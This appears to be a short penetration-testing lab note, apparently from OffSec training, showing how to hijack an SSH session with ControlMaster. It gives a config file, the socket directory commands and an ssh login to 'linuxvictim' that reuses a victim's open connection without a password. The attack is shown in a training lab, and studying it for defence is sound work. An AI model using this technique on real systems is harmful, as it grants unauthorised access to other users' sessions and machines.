Hijacking with ControlMaster

Create the ~/.ssh/config file

Host *
    ControlPath ~/.ssh/controlmaster/%r@%h:%p
    ControlMaster auto
    ControlPersist 10m

chmod 644 ~/.ssh/config
mkdir ~/.ssh/controlmaster

ls -al ~/.ssh/controlmaster/

srw------- 1 offsec offsec 0 May 13 13:55 offsec@linuxvictim:22

ssh offsec@linuxvictim

We’re now logged in on the linuxvictim machine without having been required to enter a password, effectively “piggybacking” an active legitimate connection to the same machine.

Now that we’ve demonstrated the first scenario, we’ll close the attacker SSH session as the offsec user, while leaving the “Victim Session” open.

Last updated 1 year ago